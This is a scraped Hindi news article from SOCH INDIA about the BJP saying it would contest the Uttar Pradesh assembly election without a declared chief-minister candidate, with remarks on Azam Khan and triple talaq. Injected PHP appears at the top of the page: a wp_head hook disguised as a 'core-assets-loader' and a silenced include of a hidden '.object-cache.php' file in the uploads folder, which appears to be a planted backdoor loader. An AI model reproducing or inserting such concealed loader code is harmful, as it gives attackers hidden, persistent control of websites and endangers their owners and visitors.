add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); यूपी चुनाव को लेकर BJP का ऐलान, चुनाव से पहले कोई सीएम कैंडिडेट नहीं – SOCH INDIA
Menu

राजनीति
यूपी चुनाव को लेकर BJP का ऐलान, चुनाव से पहले कोई सीएम कैंडिडेट नहीं

nobanner

यूपी में अगले साल होने वाले विधानसभा चुनाव से पहले भारतीय जनता पार्टी ने बड़ा ऐलान किया है. बीजेपी के प्रदेश अध्यक्ष केशव प्रसाद मौर्या ने कहा कि पार्टी यूपी चुनाव से पहले सीएम कैंडिडेट का ऐलान नहीं करेगी.

यूपी चुनाव को लेकर बीजेपी ने बदल दिया अपना इरादा

2017 में उत्तर प्रदेश में होने वाले विधानसभा चुनाव को लेकर सभी राजनीतिक दल तैयारियों में जुट चुके हैं. इसी बीच सोमवार को बीजेपी ने यूपी चुनाव को लेकर बड़ा ऐलान किया. अब तक मुख्यमंत्री पद के उम्मीदवार के चेहरे के साथ उत्तर प्रदेश के आगामी विधानसभा चुनाव मैदान में उतरने की बात करने वाली बीजेपी ने अपना इरादा बदल दिया है. पार्टी के प्रदेश अध्यक्ष केशव प्रसाद मौर्य ने कहा है कि उनकी पार्टी किसी को चेहरा बनाये बगैर चुनाव लड़ेगी.

मुख्यमंत्री का चेहरा है पार्टी का हर कार्यकर्ता

यूपी के बरेली में मीडिया से बातचीत करते हुए केशव प्रसाद मौर्य ने कहा कि प्रदेश के आगामी विधानसभा चुनाव के लिए सभी राजनीतिक दलों को बीजेपी के मुख्यमंत्री के चेहरे का इंतजार है. बीजेपी अपनी स्पष्ट नीति पर चलते हुए बिना चेहरे के चुनाव लड़ेगी. उन्होने कहा कि बीजेपी विश्व की सबसे बड़ी और सच्ची लोकतांत्रिक पार्टी है. पार्टी का हर कार्यकर्ता मुख्यमंत्री का चेहरा है, इसलिए मुख्यमंत्री का चेहरा घोषित करने की आवश्यकता नहीं है.

इस मौके पर केशव प्रसाद मौर्य ने कहा कि बीजेपी ने असम और दिल्ली में मुख्यमंत्री पद का चेहरा घोषित किया था जिनमें उसे असम में जीत मिली लेकिन दिल्ली में हार का सामना करना पड़ा. बाद में हरियाणा, महाराष्ट्र और झारखण्ड में चेहरा घोषित किये बिना चुनाव लड़ा गया, वहां पार्टी की जीत हुई.

300 से ज्यादा सीट जीतेगी BJP

बीजेपी नेता ने दावा किया कि प्रदेश के आगामी विधानसभा चुनाव में भारतीय जनता पार्टी 300 से ज्यादा सीट जीतेगी और केन्द्रीय संसदीय बोर्ड जिसका भी नाम घोषित करेगा, उत्तर प्रदेश के विधायक उसे ही मुख्यमंत्री मानेंगे.

इस दौरान बरेली के बाद बदायूं पहुंचे बीजेपी के प्रदेश अध्यक्ष केशव प्रसाद मौर्य ने विधानसभावार बूथ स्तरीय कार्यकर्ताओं के साथ समीक्षा बैठक की और संवाददाताओं से भी रूबरू हुए.

बीजेपी को ही करनी है आजम खान की गिरफ्तारी

अपने विवादित बयानों के लिये हमेशा सुखिर्यों मे रहने वाले समाजवादी पार्टी के राष्ट्रीय महासचिव और प्रदेश के नगर विकास मंत्री आजम खान पर बदायून में चल रहे देशद्रोह के मुकदमे और उनके अनेक विवादित बयानों पर मुकदमे दर्ज होने के बावजूद भी उनकी गिरफ्तारी ना होने के सवाल पर उन्होने कहा कि आजम खान की गिरफ्तारी बीजेपी को ही करनी है इसलिए वह अभी तक गिरफ्तार नहीं हो रहे हैं.

देश में इन दिनों चर्चा का विषय बने ‘तीन तलाक’ के मुद्दे पर पूछे गए सवाल पर उन्होंने कहा कि तीन तलाक की प्रथा पूरी तरह से महिला विरोधी है और इसे हर हाल में समाप्त किया जाना चहिये.